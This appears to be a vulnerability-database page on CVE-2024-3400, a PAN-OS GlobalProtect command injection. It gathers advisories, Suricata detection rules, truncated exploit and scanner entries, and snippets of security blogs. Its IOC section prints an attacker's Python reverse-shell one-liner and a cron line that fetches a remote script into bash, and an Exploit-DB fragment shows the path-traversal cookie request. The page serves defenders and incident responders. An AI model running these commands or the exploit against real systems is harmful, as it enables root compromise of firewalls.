CVE-2024-3400
published 2024-04-12CVE-2024-3400: A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS…
PriorityP1100critical10CVSS 3.1
AVNACLPRNUINSCCHIHAH
KEVITWEXPLOITRansomwareInitial access
CISA Known Exploited Vulnerabilitydue 2024-04-19
Exploited in the wild
EPSS
100.00%
100.0th percentile
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Affected
24 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| palo_alto_networks | pan-os | >= 10.2.0 < 10.2.9-h1 | 10.2.9-h1 |
| palo_alto_networks | pan-os | >= 11.0.0 < 11.0.4-h1 | 11.0.4-h1 |
| palo_alto_networks | pan-os | >= 11.1.0 < 11.1.2-h3 | 11.1.2-h3 |
| paloalto | cloud_ngfw | — | — |
| paloalto | pan-os | — | — |
| paloalto | prisma_access | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
| paloaltonetworks | pan-os | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandpython -c "import sys,socket,os,pty;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('172.233.228[.]93',443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash')"↗
commandprintf "SHELL=/bin/bash\n\n* * * * * root wget -qO- http://172.233.228[.]93/policy | bash\n\n" > /etc/cron.d/update↗
- →Monitor for creation or modification of /usr/lib/python3.6/site-packages/system.pth — the UPSTYLE backdoor installer drops this .pth file to achieve persistence via Python's path configuration mechanism. ↗
- →Alert on unexpected writes to /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css — UPSTYLE appends command output to this legitimate CSS file as its exfiltration channel. ↗
- →Hunt for HTTP requests to the firewall containing the URI pattern img{base64-encoded-data} — UPSTYLE parses /var/log/pan/sslvpn_ngx_error.log for this pattern to extract and execute attacker commands. ↗
- →Detect outbound connections from the GlobalProtect firewall to worldtimeapi.org — observed as attacker-controlled beacon traffic during post-exploitation. ↗
- →Alert on SMB/WinRM lateral movement originating from the GlobalProtect firewall device IP — attackers pivoted internally using a domain admin service account after compromising the firewall. ↗
- →Detect direct-to-IP HTTP requests (no hostname) from the firewall device for payload download — attackers used direct-to-IP HTTP to retrieve tools from C2. ↗
- →Look for the process string 'import sys,socket,os' in running process list on PAN-OS devices — the reverse shell one-liner contains this distinctive string detectable via ps -ef. ↗
- →Check for presence of /etc/cron.d/update on PAN-OS devices — the attacker's 'patch' script creates this cron job to periodically pull and execute a remote shell script. ↗
- →Generate a Tech Support File from the PAN-OS device and analyze logs for forensic artifacts to detect compromise. ↗
- ·Cloud NGFW, Panorama appliances, and Prisma Access are explicitly NOT affected by CVE-2024-3400 — only specific on-prem PAN-OS versions with GlobalProtect enabled are vulnerable. ↗
- ·The UPSTYLE backdoor files (filenames and indicators) were altered by UTA0218 per victim — do not rely solely on static IOCs; behavioral detection is essential. ↗
- ·The C2 server at 172.233.228.93 enforced an IP-based access control list — it only responded to requests from the compromised firewall device, making external validation of the C2 from other IPs impossible. ↗
- ·Applying mitigations or patches will NOT remediate an existing compromise — affected organizations must separately investigate for breach. ↗
CVSS provenance
nvdv3.110.0CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck10.0CRITICAL
cisa10.0CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-v475-xhc9-wfxg: A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature
ghsa_unreviewed·2024-04-12
CVE-2024-3400 [CRITICAL] CWE-20 GHSA-v475-xhc9-wfxg: A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature
A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.
VulnCheck
Palo Alto Networks PAN-OS Command Injection Vulnerability
vulncheck·2024·CVSS 10.0
CVE-2024-3400 [CRITICAL] CWE-20 Palo Alto Networks PAN-OS Command Injection Vulnerability
Palo Alto Networks PAN-OS Command Injection Vulnerability
Palo Alto Networks PAN-OS GlobalProtect feature contains a command injection vulnerability that allows an unauthenticated attacker to execute commands with root privileges on the firewall.
Affected: Palo Alto Networks PAN-OS
Required Action: Apply mitigations per vendor instructions as they become available. Otherwise, users with vulnerable versions of affected devices should enable Threat Prevention IDs available from the vendor. See the vendor bulletin for more details and a patch release schedule.
Known Ransomware Campaign Use: Known
Exploitation References: https://security.paloaltonetworks.com/CVE-2024-3400; https://unit42.paloaltonetworks.com/cve-2024-3400/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_v
CISA ICS
Siemens RUGGEDCOM APE1808 Devices Configured with Palo Alto Networks Virtual NGFW
cisa_ics·2024-04-25·CVSS 10.0
[CRITICAL] Siemens RUGGEDCOM APE1808 Devices Configured with Palo Alto Networks Virtual NGFW
ICS Advisory
##
Siemens RUGGEDCOM APE1808 Devices Configured with Palo Alto Networks Virtual NGFW
Release DateApril 25, 2024
Alert CodeICSA-24-116-03
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
View CSAF
## 1. EXECUTIVE SUMMARY
- CVSS v4 10.0
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Siemens
- Equipment: RUGGEDCOM APE1808
- Vulnerability: Command Injection
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary
CISA
Palo Alto Networks PAN-OS Command Injection Vulnerability
cisa·2024-04-12·CVSS 10.0
CVE-2024-3400 [CRITICAL] CWE-20 Palo Alto Networks PAN-OS Command Injection Vulnerability
Vulnerability: Palo Alto Networks PAN-OS Command Injection Vulnerability
Affected: Palo Alto Networks PAN-OS
Palo Alto Networks PAN-OS GlobalProtect feature contains a command injection vulnerability that allows an unauthenticated attacker to execute commands with root privileges on the firewall.
Required Action: Apply mitigations per vendor instructions as they become available. Otherwise, users with vulnerable versions of affected devices should enable Threat Prevention IDs available from the vendor. See the vendor bulletin for more details and a patch release schedule.
Notes: https://security.paloaltonetworks.com/CVE-2024-3400 ; https://nvd.nist.gov/vuln/detail/CVE-2024-3400
Remediation Due Date: 2024-04-19
Palo Alto
PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect
vendor_paloalto·2024-04-12·CVSS 10.0
CVE-2024-3400 [CRITICAL] CWE-20 PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect
PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Customers should continue to monitor this security advisory for the latest updates and product guidance.
Affected products: Cloud NGFW, PAN-OS, Prisma Access
Solution: We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mit
Suricata
ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Directory Traversal in Session Cookie (CVE-2024-3400)
suricata·2025-10-02·CVSS 10.0
CVE-2024-3400 [CRITICAL] ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Directory Traversal in Session Cookie (CVE-2024-3400)
ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Directory Traversal in Session Cookie (CVE-2024-3400)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Directory Traversal in Session Cookie (CVE-2024-3400)"; flow:established,to_server; http.cookie; content:"SESSID="; startswith; content:"|2e 2e 2f 2e 2e 2f|"; http.request_body; content:"gwHipReportCheck|3d|"; fast_pattern; http.method; content:"POST"; reference:url,labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/; reference:url,www.volexity.com/blog/2024/05/15/detecting-compromise-of-cve-2024-3400-on-palo-alto-networks-globalprotect-devices/; reference:cve,2024-3400; classtype:trojan-activity; sid:2065037; rev:1; metadata:affected_product Palo_Alto_Networks, attack_ta
Suricata
ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Session Cookie Command Injection Attempt (CVE-2024-3400)
suricata·2024-04-16·CVSS 10.0
CVE-2024-3400 [CRITICAL] ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Session Cookie Command Injection Attempt (CVE-2024-3400)
ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Session Cookie Command Injection Attempt (CVE-2024-3400)
Rule: alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Session Cookie Command Injection Attempt (CVE-2024-3400)"; flow:established,to_server; http.cookie; content:"SESSID="; startswith; content:"/opt/panlogs/tmp/device_telemetry/"; distance:0; fast_pattern; pcre:"/(?:\x60|\x7b).*(?:\x24\x7bIFS\x7d|\x2c)/R"; reference:cve,2024-3400; reference:url,labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/; reference:url,www.volexity.com/blog/2024/05/15/detecting-compromise-of-cve-2024-3400-on-palo-alto-networks-globalprotect-devices/; classtype:trojan-activity; sid:2052122; rev:2; metadata:affected_product Palo_Alto_Networks, attac
Suricata
ET RETIRED Possible UPSTYLE Command Output Retrieval Attempt
suricata·2024-04-12
CVE-2024-3400 ET RETIRED Possible UPSTYLE Command Output Retrieval Attempt
ET RETIRED Possible UPSTYLE Command Output Retrieval Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET RETIRED Possible UPSTYLE Command Output Retrieval Attempt"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/global-protect/portal/css/bootstrap.min.css"; fast_pattern; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:url,www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/; reference:url,unit42.paloaltonetworks.com/cve-2024-3400/; classtype:trojan-activity; sid:2052024; rev:3; metadata:affected_product Palo_Alto_Networks, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2024_04_12, cve CVE_2024_3400, deploy
Suricata
ET MALWARE Possible UPSTYLE Payload Retrieval Attempt
suricata·2024-04-12
CVE-2024-3400 ET MALWARE Possible UPSTYLE Payload Retrieval Attempt
ET MALWARE Possible UPSTYLE Payload Retrieval Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET MALWARE Possible UPSTYLE Payload Retrieval Attempt"; flow:established,to_client; http.stat_code; content:"200"; file.data; content:"systempth|20 3d 20 22|/usr/lib/python3.6/site-packages/system.pth|22|"; fast_pattern; content:"import base64|3b|exec|28|base64.b64decode"; within:100; content:"|22|/opt/pancfg/mgmt/licenses/PA_VM|60 2a 22|"; distance:0; reference:url,www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/; reference:url,unit42.paloaltonetworks.com/cve-2024-3400/; reference:md5,0c1554888ce9ed0da1583dbdf7b31651; classtype:trojan-activity; sid:2052025; rev:1; metadata:affected_prod
Suricata
ET MALWARE Possible UPSTYLE Command Attempt
suricata·2024-04-12
CVE-2024-3400 ET MALWARE Possible UPSTYLE Command Attempt
ET MALWARE Possible UPSTYLE Command Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET MALWARE Possible UPSTYLE Command Attempt"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"img|5b|"; fast_pattern; pcre:"/img\x5b[a-zA-Z0-9+/=]{10,}\x5d/U"; content:!"|0d 0a|Referer|0d 0a|"; reference:url,www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/; reference:url,unit42.paloaltonetworks.com/cve-2024-3400/; classtype:trojan-activity; sid:2052026; rev:1; metadata:affected_product Palo_Alto_Networks, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2024_04_12, cve CVE_2024_3400, deployment Perimeter, deployment SSLDecrypt, malware_family UPSTYLE,
Exploit-DB
Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation
exploitdb·2024-04-21·CVSS 10.0
CVE-2024-3400 [CRITICAL] Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation
Palo Alto PAN-OS bool:
ret = False
uri = "/ssl-vpn/hipreport.esp"
s = requests.Session()
r = ""
headers = {
"User-Agent" : \
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
"Content-Type": "application/x-www-form-urlencoded",
"Cookie": \
f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
}
headers_noCookie = {
"User-Agent" : \
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
}
if not "http://" or not "https://" in target:
target = "http://" + target
try:
r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
except requests.exceptions.Timeout or requests
Nuclei
GlobalProtect - OS Command Injection
nuclei·CVSS 10.0
CVE-2024-3400 [CRITICAL] GlobalProtect - OS Command Injection
GlobalProtect - OS Command Injection
A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Template:
id: CVE-2024-3400
info:
name: GlobalProtect - OS Command Injection
author: salts,parthmalhotra
severity: critical
description: |
A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the fi
Metasploit
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
metasploit
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution
This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that allow an unauthenticated attacker to create arbitrarily named files and execute shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or GlobalProtect Portal enabled and telemetry collection on (default). Affected versions include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1, < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to one hour to execute, depending on how often the telemetry service is set to run.
Tenable
Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
blogs_tenable·2026-05-27
CVE-2023-4966 Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
## Exposure Management
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Explore By Use Case
## Explore By Industry
## Tenable is the one clear leader in Exposure Management
## Exposure management
resource center
## Accelerate your exposure management strategy with practical resources and tools.
## Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect
Tenable Research has developed a graph-based model linking 600+ threat groups to real-world customer exposures. It reveals which vulnerabilities sit at the intersection of severity, active exploit
Mandiant
Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape
blogs_mandiant·2026-03-16
Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape
## Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape
## Google Threat Intelligence Group
## Google Threat Intelligence
Visibility and context on the threats that matter most.
Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark
## Introduction
Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region. In recent years ransomware operations have evolved, creating a robust ecosystem that has lowered the barrier to entry via the commoditization and specialization of the supporting underground communities, w
Mandiant
Ransomware Tactics, Techniques, and Procedures in a Shifting Threat Landscape
blogs_mandiant·2026-03-16
Ransomware Tactics, Techniques, and Procedures in a Shifting Threat Landscape
Threat Intelligence
# Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape
March 16, 2026
##### Google Threat Intelligence Group
##### Google Threat Intelligence
Visibility and context on the threats that matter most.
Contact Us & Get a Demo
Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark
### Introduction
Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region. In recent years ransomware operations have evolved, creating a robust ecosystem that has lowered the barrier to entry via the commoditiza
Recorded Future
2025 Cloud Threat Hunting and Defense Landscape
blogs_recorded_future·2026-02-19
2025 Cloud Threat Hunting and Defense Landscape
## 2025 Cloud Threat Hunting and Defense Landscape
## Executive Summary
Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:
Exploitation and Misconfiguration
Cloud Abuse
Cloud Ransomware
Credential Abuse, Account Takeover, and Unauthorized Access
Third-Party Compromise
Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security gateway
Greynoiseio
The Noise in the Silence: Unmasking CISA's Hidden KEV Ransomware Updates
blogs_greynoiseio·2026-02-02
The Noise in the Silence: Unmasking CISA's Hidden KEV Ransomware Updates
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Zscaler
Malicious PyPI Packages Deliver SilentSync RAT | ThreatLabz
blogs_zscaler·2025-09-17
Malicious PyPI Packages Deliver SilentSync RAT | ThreatLabz
Provide users with seamless, secure, reliable access to applications and data.
Build and run secure cloud apps, enable zero trust cloud connectivity, and protect workloads from data center to cloud.
Provide zero trust connectivity for IoT and OT devices and secure remote access to OT systems.
Provide zero trust site-to-site connectivity and reliable access to B2B apps for partners.
Industry Report
Zscaler: A Leader in the 2025 Gartner® Magic Quadrant™ for Security Service Edge (SSE)
USE CASES
INDUSTRY & MARKET SOLUTIONS
PARTNERS
TECHNOLOGY PARTNERS
Resource Center
Events & Trainings
Security Research & Services
Tools
Community & Support
CXO REVOLUTIONARIES
Amplifying the voices of real-world digital and zero trust pioneers
Discover how it began and where it’s going
Meet o
Tenable
Cybersecurity Snapshot: Expert Advice for Securing Critical Infrastructure’s OT and Industrial Control Systems, IoT Devices and Network Infrastructure
blogs_tenable·2025-09-05
Cybersecurity Snapshot: Expert Advice for Securing Critical Infrastructure’s OT and Industrial Control Systems, IoT Devices and Network Infrastructure
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Chinese State-Sponsored Actors Compromising Global Networks
blogs_tenable·2025-08-29
Chinese State-Sponsored Actors Compromising Global Networks
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Cybersecurity Snapshot: Agentic AI Security in Focus With Anthropic’s Chilling Abuse Disclosure and CSA’s New Identity Protection Framework
blogs_tenable·2025-08-29
Cybersecurity Snapshot: Agentic AI Security in Focus With Anthropic’s Chilling Abuse Disclosure and CSA’s New Identity Protection Framework
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Bleepingcomputer
Global Salt Typhoon hacking campaigns linked to Chinese tech firms
blogs_bleepingcomputer·2025-08-27·CVSS 9.8
[CRITICAL] Global Salt Typhoon hacking campaigns linked to Chinese tech firms
## Global Salt Typhoon hacking campaigns linked to Chinese tech firms
## Lawrence Abrams
The U.S. National Security Agency (NSA), the UK's National Cyber Security Centre (NCSC), and partners from over a dozen countries have linked the Salt Typhoon global hacking campaigns to three China-based technology firms.
According to the joint advisories [ NSA , NCSC ], Sichuan Juxinhe Network Technology Co. Ltd., Beijing Huanyu Tianqiong Information Technology Co., and Sichuan Zhixin Ruijie Network Technology Co. Ltd. have provided cyber products and services to China's Ministry of State Security and the People's Liberation Army, enabling cyber espionage operations tracked as Salt Typhoon.
Since at least 2021, the Chinese threat actors have breached government, telecommunications, transportation
Unit42
2025 Unit 42 Global Incident Response Report: Social Engineering Edition
blogs_unit42·2025-07-30
2025 Unit 42 Global Incident Response Report: Social Engineering Edition
Threat Research Center
Trend Reports
Cybercrime
## 2025 Unit 42 Global Incident Response Report: Social Engineering Edition
Unit 42
Published: July 30, 2025
Business Email Compromise
Cybercrime
Malware
Threat Actor Groups
Trend Reports
Agent Serpens
Agentic AI
ClickFix
Credential Harvesting
Lumma Stealer
MFA
Muddled Libra
Redline infostealer
Remote Access Tool
SEO poisoning
Social engineering
## Executive Summary
We see social engineering evolving into one of the most reliable, scalable and impactful intrusion methods in 2025 for five key reasons:
First , social engineering remained the top initial access vector in Unit 42 incident response cases between May 2024 and May 2025: 36% of all incidents in the IR caseload began with a social engineering tactic. These
Unit42
2025 Unit 42 Global Incident Response Report: Social Engineering Edition
blogs_unit42·2025-07-30
2025 Unit 42 Global Incident Response Report: Social Engineering Edition
## Executive Summary
We see social engineering evolving into one of the most reliable, scalable and impactful intrusion methods in 2025 for five key reasons:
First, social engineering remained the top initial access vector in Unit 42 incident response cases between May 2024 and May 2025: 36% of all incidents in the IR caseload began with a social engineering tactic. These attacks consistently bypassed technical controls by targeting human workflows, exploiting trust and manipulating identity systems. More than one-third of social engineering incidents involved non-phishing techniques, including search engine optimization (SEO) poisoning, fake system prompts and help desk manipulation.
Second, high-touch attacks are on the rise. Threat actors such as Muddled Libra bypass multi-factor aut
Bleepingcomputer
Chinese hackers breached National Guard to steal network configurations
blogs_bleepingcomputer·2025-07-17
Chinese hackers breached National Guard to steal network configurations
## Chinese hackers breached National Guard to steal network configurations
## Lawrence Abrams
The Chinese state-sponsored hacking group known as Salt Typhoon breached and remained undetected in a U.S. Army National Guard network for nine months in 2024, stealing network configuration files and administrator credentials that could be used to compromise other government networks.
Salt Typhoon is a Chinese state-sponsored hacking group that is believed to be affiliated with China's Ministry of State Security (MSS) intelligence agency. The hacking group has gained notoriety over the past two years for its wave of attacks on telecommunications and broadband providers worldwide, including AT&T, Verizon, Lumen , Charter, Windstream , and Viasat .
The goal of some of these attacks was to gain
Tenable
Frequently Asked Questions About Iranian Cyber Operations
blogs_tenable·2025-06-27
Frequently Asked Questions About Iranian Cyber Operations
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Reducing Remediation Time Remains a Challenge: How Tenable Vulnerability Watch Can Help
blogs_tenable·2025-04-25
Reducing Remediation Time Remains a Challenge: How Tenable Vulnerability Watch Can Help
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
Verizon 2025 DBIR: Tenable Research Collaboration Shines a Spotlight on CVE Remediation Trends
blogs_tenable·2025-04-23
Verizon 2025 DBIR: Tenable Research Collaboration Shines a Spotlight on CVE Remediation Trends
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Greynoiseio
GreyNoise Detects Active Exploitation of Silk Typhoon-Linked CVEs
blogs_greynoiseio·2025-03-06·CVSS 9.1
[CRITICAL] GreyNoise Detects Active Exploitation of Silk Typhoon-Linked CVEs
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Find out immediately if an asset communicates with a malicious IP address
Vulnerability Prioritization Get real-time insight into active exploitation trends to better understand risk and severity
SOC Efficiency Filter out noisy, low priority and false-positive alerts from mass internet scanners
Incident Investigation Add context to incidents to speed the determinations of scope and timelines
Threat Hunting Quickly identify anomalous behavior and enrich your threat hunting campaigns
Why GreyNoise
CVE Disclosure Early Warning Get an early warning when traffic spikes indicate a high likelihood of new disclosures
Compromised Asset Detection Fin
Bleepingcomputer
Silk Typhoon hackers now target IT supply chains to breach networks
blogs_bleepingcomputer·2025-03-05
Silk Typhoon hackers now target IT supply chains to breach networks
## Silk Typhoon hackers now target IT supply chains to breach networks
## Bill Toulas
